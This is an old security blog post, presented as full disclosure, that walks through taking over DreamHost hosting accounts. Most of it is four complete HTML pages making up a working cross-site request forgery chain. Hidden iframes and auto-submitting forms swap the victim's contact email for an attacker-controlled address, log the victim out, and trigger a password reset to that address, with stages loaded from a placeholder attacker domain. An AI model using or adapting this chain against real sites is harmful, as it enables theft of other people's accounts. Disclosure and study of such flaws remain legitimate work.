Security Related

Guy Mizrahi about Security and Technology.
Subscribe

Archive for June 14th, 2008

How to Steal DreamHost accounts?

June 14, 2008 By: Guy Mizrahi Category: Hacking, Security 6 Comments →

I thought a lot before posting this, but in the name of full disclosures..

This is the second time someone is trying to do that against my dreamhost account so I guess that it need to be public.

It will work on any dreamhost costumer that logged in to his account (Note – you must use the logout button and then it will not work on your account 🙂 ).

A legal notice – If you use this to hack into someone’s account you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purpose and to make dreamhost fix it asap..

A short manual – how to steal dreamhost accounts (I guess that it can be used to steal any account that use same defective security mechanism).

So – How?

It is done by sending a link to a page you need to create and host online.

There will be 4 web pages to do 3 stages of attack:

1. Automatic change of contact details in the dreamhost control panel from your mark’s details to something you can get access to (the most important is the e-mail address).

2. automatic logoff your mark from dreamhost’s control panel.

3. request a new password to the new e-mail from dreamhost.

The first page (lets call it start.php):

   1:  <html>
   2:  <META content="text/html; charset=iso-8859-8-i" http-equiv=Content-Type>
   3:  <a1>This page can not be found</a1>
   4:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info.php" scrolling="no" frameborder="0"></iframe>
   5:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
   6:  </iframe>
   7:  </html>

as you can see, this page is loading two iframes with 0.1% height and width so the mark can’t see it.

info.php:

   1:  <html>
   2:  <body>
   3:  <form method=post action="https://panel.dreamhost.com/id/?" id="2" name="asd">
   4:  <input type=hidden name=tab value="contact">
   5:  <input type=hidden name="command" value="submit_edit">
   6:      <tr valign=top>
   7:          <td id=txt align=right><b>Name:</b></td>
   8:          <td><select name="prefix" id=frm>
   9:                  <option value=""></option>
  10:                  </select>
  11:                  <input name="first" value="somename" size="8" id=frm>
  12:                  <input name="middle" size="1" id=frm>
  13:                  <input name="last" value="somefamily" size="8" id=frm>
  14:                  <select name="suffix" id=frm>
  15:                  <option value=""></option>
  16:                  </select>
  17:          </td>
  18:      </tr>
  19:      <tr valign=top>
  20:  
  21:          <td id=txt align=right><b>Address:</b></td>
  22:          <td><input name="street1" value="somestreet" size=30 id=frm><br>
  23:                  <input name="street2" size=30 id=frm><br>
  24:                  <input name="city" value="somecity"  size=20 id=frm>, <input name="state" size=2 id=frm> <input name="zip" value="1324" size=8 id=frm><br><select name="country" id=frm><option value="US">United States</option>
  25:  </select>
  26:          </td>
  27:      </tr>
  28:      <tr valign=top>
  29:          <td id=txt align=right><b>Email:</b></td>
  30:          <td><input name="email" value="somemail@somedomain.com" size=30 id=frm></td>
  31:      </tr>
  32:      <tr>
  33:          <td id=txt align=right><b>Phone:</b></td>
  34:          <td><input name="phone" value="+123.45.6789123" size=30 id=frm></td>
  35:      </tr>
  36:      <tr>
  37:          <td id=txt align=right><b>Fax:</b>*</td>
  38:          <td><input name="fax" size=30 id=frm></td>
  39:      </tr>
  40:      <tr>
  41:          <td id=txt align=right><b>IM:</b>*</td>
  42:          <td><input name="chat" size=30 id=frm></td>
  43:      </tr>
  44:      <tr>
  45:          <td id=txt align=right><b>URL:</b>*</td>
  46:          <td><input name="url" size=30 id=frm></td>
  47:      </tr>
  48:      <tr>
  49:          <td></td>
  50:          <td id=txt>*optional information</td>
  51:      </tr>
  52:      <tr>
  53:          <td colspan=2 align=center id=txt><input type=submit value="Submit New Contact Info" id=frm><br>or<br></td>
  54:      </tr>
  55:  </form>
  56:  <script>
  57:  document.asd.submit();
  58:  </script>
  59:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
  60:  </body>
  61:  <html>

as you can see – this page will change the mark’s dreamhost control panel details to whatever you want and then redirect to info3.php

info3.php:

   1:  <html>
   2:  <iframe height="0.1%" width="0.1%" src="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout" scrolling="no" frameborder="0">
   3:  </iframe>
   4:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info2.html" scrolling="no" frameborder="0"></iframe>
   5:  </html>

as you can see – info3.php is doing two things:

1. logoff your mark from dreamhost control panel

2. redirect to info2.html

info2.html:

   1:  <html>
   2:  <body onload="document.getElementById('2').submit()">
   3:  <form method="post" class="fancyform" action="https://panel.dreamhost.com/login/forgot.cgi" id="2">
   4:  <input type="hidden" name="return_url" value="" />
   5:  <input type="hidden" name="email_pwd_submitted" value="1" />
   6:  <input name="email" class="text" value="somemail@somedomain.com">
   7:  <input type="submit" class="button" value="Email me my password!">
   8:  </form>
   9:  </body>
  10:  </html>

this last step is to send a forget password notice to the new email address.

that’s it – 4 pages and you can get any dreamhost account..


Bad Behavior has blocked 41 access attempts in the last 7 days.

FireStats icon Powered by FireStats